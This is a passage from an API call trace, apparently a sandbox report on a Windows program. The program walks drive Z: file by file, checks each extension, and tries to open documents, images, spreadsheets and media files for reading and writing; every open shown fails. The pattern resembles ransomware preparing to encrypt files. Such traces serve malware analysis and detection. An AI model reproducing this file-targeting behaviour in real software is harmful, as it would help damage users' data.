lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.105] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cdHLWs2KE.docx", cAlternateFileName="")) returned 1 [0176.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.105] PathFindExtensionW (pszPath="Z:\\cdHLWs2KE.docx") returned=".docx" [0176.111] CreateFileW (lpFileName="Z:\\cdHLWs2KE.docx" (normalized: "z:\\cdhlws2ke.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.112] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf37f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SHCEF.gif", cAlternateFileName="")) returned 1 [0176.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.112] PathFindExtensionW (pszPath="Z:\\SHCEF.gif") returned=".gif" [0176.116] CreateFileW (lpFileName="Z:\\SHCEF.gif" (normalized: "z:\\shcef.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.117] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfcb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P6tWitG0.ppt", cAlternateFileName="")) returned 1 [0176.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.117] PathFindExtensionW (pszPath="Z:\\P6tWitG0.ppt") returned=".ppt" [0176.121] CreateFileW (lpFileName="Z:\\P6tWitG0.ppt" (normalized: "z:\\p6twitg0.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.123] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZcPV3qk7PkeQOKKV.xls", cAlternateFileName="")) returned 1 [0176.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.123] PathFindExtensionW (pszPath="Z:\\ZcPV3qk7PkeQOKKV.xls") returned=".xls" [0176.129] CreateFileW (lpFileName="Z:\\ZcPV3qk7PkeQOKKV.xls" (normalized: "z:\\zcpv3qk7pkeqokkv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.133] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x134dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X18sQ2pVfY.mp3", cAlternateFileName="")) returned 1 [0176.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.133] PathFindExtensionW (pszPath="Z:\\X18sQ2pVfY.mp3") returned=".mp3" [0176.139] CreateFileW (lpFileName="Z:\\X18sQ2pVfY.mp3" (normalized: "z:\\x18sq2pvfy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.143] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb1b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOk7P095P.xls", cAlternateFileName="")) returned 1 [0176.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.143] PathFindExtensionW (pszPath="Z:\\EOk7P095P.xls") returned=".xls" [0176.148] CreateFileW (lpFileName="Z:\\EOk7P095P.xls" (normalized: "z:\\eok7p095p.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.150] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5bc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BDK13uXlqscCs2sGFIQ.doc", cAlternateFileName="")) returned 1 [0176.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.150] PathFindExtensionW (pszPath="Z:\\BDK13uXlqscCs2sGFIQ.doc") returned=".doc" [0176.155] CreateFileW (lpFileName="Z:\\BDK13uXlqscCs2sGFIQ.doc" (normalized: "z:\\bdk13uxlqsccs2sgfiq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.156] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14f79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ow3Vle4.swf", cAlternateFileName="")) returned 1 [0176.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.157] PathFindExtensionW (pszPath="Z:\\ow3Vle4.swf") returned=".swf" [0176.162] CreateFileW (lpFileName="Z:\\ow3Vle4.swf" (normalized: "z:\\ow3vle4.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.172] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11dda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KLUwMaQCvDlNDoCoQ3.xls", cAlternateFileName="")) returned 1 [0176.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.172] PathFindExtensionW (pszPath="Z:\\KLUwMaQCvDlNDoCoQ3.xls") returned=".xls" [0176.177] CreateFileW (lpFileName="Z:\\KLUwMaQCvDlNDoCoQ3.xls" (normalized: "z:\\kluwmaqcvdlndocoq3.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.179] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16f00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RBkxpRf3.m4a", cAlternateFileName="")) returned 1 [0176.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.179] PathFindExtensionW (pszPath="Z:\\RBkxpRf3.m4a") returned=".m4a" [0176.184] CreateFileW (lpFileName="Z:\\RBkxpRf3.m4a" (normalized: "z:\\rbkxprf3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.186] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OCVoNePy.png", cAlternateFileName="")) returned 1 [0176.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.186] PathFindExtensionW (pszPath="Z:\\OCVoNePy.png") returned=".png" [0176.191] CreateFileW (lpFileName="Z:\\OCVoNePy.png" (normalized: "z:\\ocvonepy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.193] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dPc6HLBDbx19XugtWM.jpg", cAlternateFileName="")) returned 1 [0176.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.193] PathFindExtensionW (pszPath="Z:\\dPc6HLBDbx19XugtWM.jpg") returned=".jpg" [0176.198] CreateFileW (lpFileName="Z:\\dPc6HLBDbx19XugtWM.jpg" (normalized: "z:\\dpc6hlbdbx19xugtwm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.200] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywcd6Y1iM3n9j4GZ20Ya.png", cAlternateFileName="")) returned 1 [0176.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.200] PathFindExtensionW (pszPath="Z:\\ywcd6Y1iM3n9j4GZ20Ya.png") returned=".png" [0176.205] CreateFileW (lpFileName="Z:\\ywcd6Y1iM3n9j4GZ20Ya.png" (normalized: "z:\\ywcd6y1im3n9j4gz20ya.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.218] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x873d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3QVfoNUquygvYJYnxL.m4a", cAlternateFileName="")) returned 1 [0176.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.219] PathFindExtensionW (pszPath="Z:\\3QVfoNUquygvYJYnxL.m4a") returned=".m4a" [0176.225] CreateFileW (lpFileName="Z:\\3QVfoNUquygvYJYnxL.m4a" (normalized: "z:\\3qvfonuquygvyjynxl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.228] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc601, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AhsbCQy.csv", cAlternateFileName="")) returned 1 [0176.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.228] PathFindExtensionW (pszPath="Z:\\AhsbCQy.csv") returned=".csv" [0176.233] CreateFileW (lpFileName="Z:\\AhsbCQy.csv" (normalized: "z:\\ahsbcqy.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.235] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16e80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OpdqDACZhn.ots", cAlternateFileName="")) returned 1 [0176.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.235] PathFindExtensionW (pszPath="Z:\\OpdqDACZhn.ots") returned=".ots" [0176.241] CreateFileW (lpFileName="Z:\\OpdqDACZhn.ots" (normalized: "z:\\opdqdaczhn.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.242] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16ba0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxTfgN.jpg", cAlternateFileName="")) returned 1 [0176.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.243] PathFindExtensionW (pszPath="Z:\\xxTfgN.jpg") returned=".jpg" [0176.248] CreateFileW (lpFileName="Z:\\xxTfgN.jpg" (normalized: "z:\\xxtfgn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.250] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaeb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1HtpGhRDb.ots", cAlternateFileName="")) returned 1 [0176.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.250] PathFindExtensionW (pszPath="Z:\\1HtpGhRDb.ots") returned=".ots" [0176.255] CreateFileW (lpFileName="Z:\\1HtpGhRDb.ots" (normalized: "z:\\1htpghrdb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.257] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tE4nVH8Z0MXjyxhaHaNx.pdf", cAlternateFileName="")) returned 1 [0176.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.257] PathFindExtensionW (pszPath="Z:\\tE4nVH8Z0MXjyxhaHaNx.pdf") returned=".pdf" [0176.263] CreateFileW (lpFileName="Z:\\tE4nVH8Z0MXjyxhaHaNx.pdf" (normalized: "z:\\te4nvh8z0mxjyxhahanx.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.264] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11d7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IBowTJ.csv", cAlternateFileName="")) returned 1 [0176.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.264] PathFindExtensionW (pszPath="Z:\\IBowTJ.csv") returned=".csv" [0176.270] CreateFileW (lpFileName="Z:\\IBowTJ.csv" (normalized: "z:\\ibowtj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.273] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9776, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CAYEd2GbRKcU4.jpg", cAlternateFileName="")) returned 1 [0176.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.273] PathFindExtensionW (pszPath="Z:\\CAYEd2GbRKcU4.jpg") returned=".jpg" [0176.279] CreateFileW (lpFileName="Z:\\CAYEd2GbRKcU4.jpg" (normalized: "z:\\cayed2gbrkcu4.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.281] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb6a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FPTqG3qP.ots", cAlternateFileName="")) returned 1 [0176.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.281] PathFindExtensionW (pszPath="Z:\\FPTqG3qP.ots") returned=".ots" [0176.286] CreateFileW (lpFileName="Z:\\FPTqG3qP.ots" (normalized: "z:\\fptqg3qp.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.288] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, 